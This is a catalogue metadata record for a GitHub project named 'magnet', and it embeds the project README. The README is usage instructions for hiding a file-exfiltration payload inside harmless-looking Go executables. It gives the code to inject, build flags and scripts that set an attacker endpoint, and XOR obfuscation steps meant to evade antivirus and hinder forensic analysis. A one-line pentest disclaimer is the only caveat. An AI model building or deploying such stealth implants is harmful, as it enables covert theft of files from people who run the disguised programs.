{"id":19544854,"url":"https://github.com/ariary/magnet","last_synced_at":"2025-04-26T19:31:48.089Z","repository":{"id":64308001,"uuid":"474954310","full_name":"ariary/magnet","owner":"ariary","description":"🧲 Hide data exfiltration in harmless looking executable","archived":false,"fork":false,"pushed_at":"2023-10-23T07:18:28.000Z","size":166,"stargazers_count":4,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-04T17:11:38.896Z","etag":null,"topics":["data-exfiltration","encryption","infosec","malware","pentest","pentest-tool"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"unlicense","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ariary.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-03-28T10:35:19.000Z","updated_at":"2024-03-06T01:50:14.000Z","dependencies_parsed_at":"2024-06-20T14:12:02.174Z","dependency_job_id":"ef1fceed-0e57-4811-8287-a786ffd1418a","html_url":"https://github.com/ariary/magnet","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fmagnet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fmagnet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fmagnet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fmagnet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ariary","download_url
":"https://codeload.github.com/ariary/magnet/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251041427,"owners_count":21527193,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["data-exfiltration","encryption","infosec","malware","pentest","pentest-tool"],"created_at":"2024-11-11T03:32:34.418Z","updated_at":"2025-04-26T19:31:47.761Z","avatar_url":"https://github.com/ariary.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cdiv align=center\u003e\n  \u003ch1\u003emagnet\u003c/h1\u003e\n  \u003cpre\u003e🧲⚡\n  Grab interesting files from target\u003cbr\u003e\n\n  \u003cb\u003e\u003ci\u003eCross-platform\u003c/i\u003e\u003c/b\u003e\n  \u003cb\u003e\u003ci\u003eStealth\u003c/i\u003e\u003c/b\u003e\n  \u003cb\u003e\u003ci\u003ePortable\u003c/i\u003e\u003c/b\u003e  \n  \u003c/pre\u003e\n\u003c/div\u003e\n\nThe library is built to fetch predefined files of interest from a remote device. 
It assumes that an HTTP endpoint is listening when the program is launched.\n\n**Program execution on target will stealthily provide you with the files you ask for.**\n\nYou have 2 possibilities:\n* [Hide exfiltration in your program](#-inject-magnet-in-your-go-program)\n* [Use the standalone `magnet` executable](#-standalone)\n\n\u003csup\u003e\u003ci\u003eFor educational purposes only or during a pentest assessment with prior permission\u003c/i\u003e\u003c/sup\u003e\n\n## Usage\n\nAll the work is done **at compilation time**; you need to specify:\n* The ***remote endpoint***, where juicy files are uploaded\n* The ***Juicy files***, list of files you want to grab\n* The ***target os***, to fit the target (one of: `windows`, `darwin`, `linux`)\n* The ***method*** used for exfiltration (`http`, `tcp`)\n```shell\nexport KEY=[YOUR_KEY]\nexport FILES=[FILENAME]\nexport ENDPOINT=[ATTACKER_ENDPOINT]\nexport METHOD=[EXFILTRATION_METHOD]\n```\n\n### 🥷 Inject `magnet` in your Go program\n\n1. Add `magnet` import and declare variables outside your `main()` function:\n```golang\nimport \"github.com/ariary/magnet/pkg/magnet\"\n\nvar FileList,Key,Endpoint,Method string\n```\n\n2. Add magnet payload in the `main()`:\n```golang\n\tsender := magnet.InitMagnetSender(Method)\n\tmagnet.Magnet(sender, FileList, Endpoint, Key, debug)\n```\n\n3. 
Finally, modify the build command by adding `-ldflags \"-X 'main.FileList=$FILES' -X 'main.Key=$KEY' -X 'main.Endpoint=$ENDPOINT' -X 'main.Method=$METHOD'\"` and `CGO_ENABLED=0`.\n\nSee [declare `magnet` environment variables](#declare-magnet-envar).\n\n### ⚡ Standalone\n\nTo build the `magnet` binary in one step:\n```shell\n# ensure lobfuscator is in your PATH\n./build.sh $FILES $ENDPOINT $KEY $METHOD\n```\n\nSee [`lobfuscator`](#build-lobfuscator) and the [full example](https://github.com/ariary/magnet/blob/main/examples/EXAMPLES.md).\n\n### Obfuscation/Encryption\n\nTo avoid detection systems, since we are looking for sensitive files, **the list of files we want to grab must not be in clear text within the binary**. Hence it uses basic encryption, with the decryption key embedded in the binary. *(The aim is only to avoid AV and detection systems, not to provide a strong encryption scheme.)*\n\nThe same is done for the remote endpoint, to make forensic analysis harder.\n\n`lobfuscator` is a simple tool that performs the XOR encryption/decryption.\n\nAn example of building the obfuscated list:\n```shell\ncat [FILE] | lobfuscator $KEY \u003e obfuscated.txt\n# decrypt: cat obfuscated.txt | lobfuscator -d $KEY\n```\n\n#### Build `lobfuscator`\n```shell\nmake build.lobfuscator\n```\n\n#### Declare `magnet` envar\n\nDefine the `FILES` and `ENDPOINT` environment variables:\n```shell\nexport FILES=$(cat [FILE] | lobfuscator $KEY)\nexport ENDPOINT=$(echo \"[ENDPOINT]\" | lobfuscator $KEY)\n```\n\n\n#### Go further\n\nYou can also use `lobfuscator` without providing a key (it will generate a random key the size of the input):\n```shell\n# Encrypt with random key\ncat samples/linux_juicy_files.txt | ./lobfuscator \u003e encrypted.txt 2\u003etmp.txt \u0026\u0026 cat tmp.txt | cut -d \":\" -f 2- \u003e keys.txt \u0026\u0026 rm tmp.txt\n# Decrypt using file containing keys\ncat encrypted.txt | ./lobfuscator -d -kf keys.txt\n```\n\n## Notes\n\n* For the remote endpoint, I suggest using the 
`/push` endpoint of a [`gitar`](https://github.com/ariary/gitar) listener\n* The software is built to be stealthy, hence:\n  * error handling is not verbose (a hidden flag, `-thisisdebug`, enables more verbosity)\n  * I suggest overwriting the usage string in `magnet.go` to fit your attack scenario (for standalone use)\n* To enhance binary obfuscation, use [`garble`](https://github.com/burrowers/garble) to compile `magnet` instead of `go` (adapt `build.sh` accordingly)\n\n## To do\n\n* Handle directories\n* Use other protocols to send files (ICMP, DNS, SMTP, etc.)\n* `magnetgentool` is in the making; it will be used with a `//go:generate` comment to stealthily inject magnet code.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Fmagnet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fariary%2Fmagnet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Fmagnet/lists"}